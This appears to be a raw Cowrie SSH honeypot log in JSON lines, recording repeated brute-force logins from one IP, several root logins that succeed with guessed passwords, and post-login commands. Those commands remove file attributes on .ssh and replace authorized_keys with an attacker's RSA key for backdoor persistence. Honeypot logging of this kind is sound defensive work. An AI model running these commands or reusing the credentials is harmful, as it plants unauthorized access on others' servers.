{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:38.629590Z","src_ip":"212.227.235.229","session":"8eb680adfec3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:38.943239Z","src_ip":"212.227.235.229","session":"8eb680adfec3"}
{"eventid":"cowrie.login.success","username":"root","password":"odooserver","message":"login attempt [root/odooserver] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:39.309214Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:40.040224Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:21:40.041085Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:21:40.042312Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.login.failed","username":"audit","password":"12345","message":"login attempt [audit/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:21:40.237803Z","src_ip":"212.227.235.229","session":"8eb680adfec3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:40.370629Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:41.045395Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:21:41.046139Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:21:41.374946Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:41.375802Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:41.551925Z","src_ip":"212.227.235.229","session":"8eb680adfec3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34150,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7b7e7a62f2a","protocol":"ssh","message":"New connection: 212.227.235.229:34150 (1.2.3.4:22) [session: e7b7e7a62f2a]","sensor":"my-vps","timestamp":"2025-09-08T22:21:41.714042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:41.714734Z","src_ip":"212.227.235.229","session":"e7b7e7a62f2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:42.049243Z","src_ip":"212.227.235.229","session":"e7b7e7a62f2a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:21:43.422736Z","src_ip":"212.227.235.229","session":"e7b7e7a62f2a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:44.757608Z","src_ip":"212.227.235.229","session":"e7b7e7a62f2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34156,"dst_ip":"1.2.3.4","dst_port":22,"session":"c27313dcec2a","protocol":"ssh","message":"New connection: 212.227.235.229:34156 (1.2.3.4:22) [session: c27313dcec2a]","sensor":"my-vps","timestamp":"2025-09-08T22:21:45.076062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:45.077631Z","src_ip":"212.227.235.229","session":"c27313dcec2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:45.407374Z","src_ip":"212.227.235.229","session":"c27313dcec2a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:46.756457Z","src_ip":"212.227.235.229","session":"c27313dcec2a"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:47.084728Z","src_ip":"212.227.235.229","session":"4d3c5ebda1ec"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:47.086406Z","src_ip":"212.227.235.229","session":"c27313dcec2a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:49.483766Z","src_ip":"212.227.235.229","session":"04b70dd97d57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:49.484422Z","src_ip":"212.227.235.229","session":"04b70dd97d57"}
{"eventid":"cowrie.session.closed","duration":"25.9","message":"Connection lost after 25.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:49.486206Z","src_ip":"212.227.235.229","session":"04b70dd97d57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49890,"dst_ip":"1.2.3.4","dst_port":22,"session":"38cb76fc0b04","protocol":"ssh","message":"New connection: 212.227.235.229:49890 (1.2.3.4:22) [session: 38cb76fc0b04]","sensor":"my-vps","timestamp":"2025-09-08T22:21:50.795809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:50.796702Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:50.980154Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123321","message":"login attempt [root/abc123321] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:51.754447Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:52.176180Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:21:52.176892Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:21:52.177847Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:52.361969Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:21:52.745952Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:21:52.746690Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:21:52.931773Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:52.932645Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49906,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec2b230965f3","protocol":"ssh","message":"New connection: 212.227.235.229:49906 (1.2.3.4:22) [session: ec2b230965f3]","sensor":"my-vps","timestamp":"2025-09-08T22:21:53.104267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:53.105221Z","src_ip":"212.227.235.229","session":"ec2b230965f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:53.282991Z","src_ip":"212.227.235.229","session":"ec2b230965f3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:21:54.039360Z","src_ip":"212.227.235.229","session":"ec2b230965f3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:55.220878Z","src_ip":"212.227.235.229","session":"ec2b230965f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60748,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bfc72c3f4ee","protocol":"ssh","message":"New connection: 212.227.235.229:60748 (1.2.3.4:22) [session: 0bfc72c3f4ee]","sensor":"my-vps","timestamp":"2025-09-08T22:21:55.395693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:55.396336Z","src_ip":"212.227.235.229","session":"0bfc72c3f4ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:21:55.572169Z","src_ip":"212.227.235.229","session":"0bfc72c3f4ee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:21:56.317096Z","src_ip":"212.227.235.229","session":"0bfc72c3f4ee"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:56.494180Z","src_ip":"212.227.235.229","session":"0bfc72c3f4ee"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:21:56.523929Z","src_ip":"212.227.235.229","session":"38cb76fc0b04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51106,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f6e1eb96846","protocol":"ssh","message":"New connection: 212.227.235.229:51106 (1.2.3.4:22) [session: 8f6e1eb96846]","sensor":"my-vps","timestamp":"2025-09-08T22:21:59.926358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:59.927213Z","src_ip":"212.227.235.229","session":"8f6e1eb96846"}
